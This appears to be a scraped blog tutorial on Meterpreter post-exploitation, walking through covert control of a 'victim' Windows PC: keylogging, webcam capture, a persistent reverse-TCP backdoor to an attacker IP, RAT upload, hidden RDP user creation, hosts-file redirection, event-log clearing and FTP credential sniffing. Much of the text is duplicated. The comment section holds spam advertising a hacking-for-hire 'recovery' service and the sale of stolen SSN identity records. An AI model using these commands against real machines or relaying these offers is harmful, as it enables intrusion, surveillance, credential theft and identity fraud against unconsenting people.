Meterpreter is a famous payload that is injected via the
reflective DLL injection. It is VERY powerful. It has a lot of commands that we
will be looking at. Using meterpreter session, you can even pivot through
remote networks and exploit Systems inside them as if you had direct access to
it.
PHP Code:
ps
To list active processes, and their PIDs.
If we injected the payload through browser, we need to move away from it. If browser gets closed, we will lose our session as well. How do we do that? Migrate to another process. Let's migrate to exploter.exe
(Note: This is not internet explorer)
Find the pid of explorer.exe and then type:
If we injected the payload through browser, we need to move away from it. If browser gets closed, we will lose our session as well. How do we do that? Migrate to another process. Let's migrate to exploter.exe
(Note: This is not internet explorer)
Find the pid of explorer.exe and then type:
PHP Code:
migrate (pid)
For example:
PHP Code:
Migrate 568
Now that we are safe, we might as well start exploring other features. We can get screenshots of both victim's PC and webcam by using:
PHP Code:
screenshot (For screenshot of his PC)
webcam_snap (For screenshot of his webcam)
webcam_snap (For screenshot of his webcam)
Next, you can view files and change directories directly
from meterpreter session by using:
PHP Code:
ls - Similar to 'Dir' in DOS
cd - to change directories
del - delete
rmdir - remove directory
mkdir - make directory
cd - to change directories
del - delete
rmdir - remove directory
mkdir - make directory
NOTE: When you are browsing or doing anything with his drives make sure you use double slashes \\ all the time.
Now let's try to get admin access by typing:
GetSystem
This will most likely fail on windows 7. There are three different techniques meterpreter will try.
I said previously that meterpreter has Keylogger option. Let's test it. We have to migrate to explorer process for this to work.
PHP Code:
Keyscan_start
Now wait for a while and then type:
PHP Code:
Keyscan_dump
It will dump keystrokes recorded.
Example:
Example:
PHP Code:
keyscan_dump
"Dumping captured keystrokes...
<return> Hello There it worked!"
"Dumping captured keystrokes...
<return> Hello There it worked!"
Now let's make a backdoor so even when he shutdowns PC, we will continue getting the session when he gets back on.
NOTE: You will have to start multi/handler to listen for connections
PHP Code:
run persistence -U -I (Interval for every attempt to connect, for example if we set it to 5 it will try to connect every 5 seconds) -P (lport) -R (LHost)
PHP Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (local IP)
set lport (port used)
exploit
set payload windows/meterpreter/reverse_tcp
set lhost (local IP)
set lport (port used)
exploit
For example:
PHP Code:
Run Persistence -U -I 5 -P 4444 -R 192.168.2.101
Now that it is backdoor-ed, we will have access to it always. However, some of you don't like all this typing and prefer GUI, so you can upload your RAT server.
PHP Code:
upload C:\\RAT.exe C:\\
This will upload our server called "RAT.exe"
from our C:\ drive to his C:\ drive.
NOTE: If you don't have admin privs then upload it elsewhere, good place would be C:\users\%username%. Now let's start DOS and run the file we uploaded.
NOTE: If you don't have admin privs then upload it elsewhere, good place would be C:\users\%username%. Now let's start DOS and run the file we uploaded.
PHP Code:
Shell
Now navigate to where you uploaded the file and run it.
PHP Code:
cd C:\
start Hello.exe
start Hello.exe
We got a connection. Meterpreter has one nice option, we can remotely download the files from his PC using download command.
PHP Code:
Download C:\\hello.exe
You can enable remote desktop on target machine as well. Do this by typing:
PHP Code:
run getgui -u username -p password -e
This will enable remote desktop, and create user with desired username and password. Connect to him through BackTrack console by typing:
PHP Code:
rdesktop -u Username -P password RemoteIP
This is not the best way to view his screen because he will be informed of you trying to intrude. I personally recommend using vnc instead.
PHP Code:
run vnc
This will allow you to view his desktop and control it at will.
Meterpreter also has ability to edit hosts file.
PHP Code:
run hostsedit -e *IP of site you want to redirect to*,*site that you want redirected*
For example:
PHP Code:
run hostsedit -e 127.0.0.1,google.com
To delete the event after you're done, run:
PHP Code:
clearev
Sniffing
PHP Code:
use sniffer
sniffer_start (interface)
sniffer_start (interface)
In my case it's:
PHP Code:
sniffer_start 1
Now on the victim side, let's use filezilla to log in FTP website.
Wait for some time before dumping the captured results by:
PHP Code:
sniffer_dump 1 (<---interface) /root/Desktop/name.cap
Now stop the sniffer with:
PHP Code:
sniffer_stop 1
It will create name.cap file on Desktop which can be opened by WireShark. So, let's open a new console in BackTrack and type WireShark in it. This will load the GUI.
Simply click on add file and choose your CAP file. Browse through the logs and you will see that it successfully captured the FTP username and password.
Nice tutorial :)
ReplyDeleteI was scammed by cityinvestgp, I got a message from a trader on my Instagram and told me about how high their profit after investing was, I decided to invest in the online trade but they kept asking for more money including withdrawal fee and it was until then I realized I was being scammed. I couldn't let go because I invested my savings as at that time. I had to make a research on how I could recover my funds from them and I came across the website REMOTESPYTECH (@) GMAIL COM after so many searches. I read several good reviews about the website from various scam victims they have helped and I decided to contact the website admin for help.
DeleteI was opportune to get my money back from the scam brokers through the help of the website recovery professional, they recovered my investments for me with all the profits I was entitled to within two weeks of contacting them. You can write REMOTESPYTECH (@) gmailcom for help too if you a victim of any kind of scam
They are experts at dealing with online scam and assisting victims in receiving reimbursement, tracking down digital fingerprints, cyber analysis and thorough investigation.
They offer other services such as
Phone cloning ( catching, monitoring and tracking a suspected cheating spouse )
Website hack
Boost of credit scores
Clearing of criminal records
Fixes bad debts etc
Contact them now!!!
REMOTESPYTECH (@) GMAIL, COM
WhatsApp: +56 9 3129 3092
Regards
Perfect Review
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**PRICE FOR ONE LEAD/FULLZ 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Minimum buy 25 to 30 leads/fullz
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
I was scammed by cityinvestgp, I got a message from a trader on my Instagram and told me about how high their profit after investing was, I decided to invest in the online trade but they kept asking for more money including withdrawal fee and it was until then I realized I was being scammed. I couldn't let go because I invested my savings as at that time. I had to make a research on how I could recover my funds from them and I came across the website REMOTESPYTECH (@) GMAIL COM after so many searches. I read several good reviews about the website from various scam victims they have helped and I decided to contact the website admin for help.
ReplyDeleteI was opportune to get my money back from the scam brokers through the help of the website recovery professional, they recovered my investments for me with all the profits I was entitled to within two weeks of contacting them. You can write REMOTESPYTECH (@) gmailcom for help too if you a victim of any kind of scam
They are experts at dealing with online scam and assisting victims in receiving reimbursement, tracking down digital fingerprints, cyber analysis and thorough investigation.
They offer other services such as
Phone cloning ( catching, monitoring and tracking a suspected cheating spouse )
Website hack
Boost of credit scores
Clearing of criminal records
Fixes bad debts etc
Contact them now!!!
REMOTESPYTECH (@) GMAIL, COM
WhatsApp: +56 9 3129 3092
Regards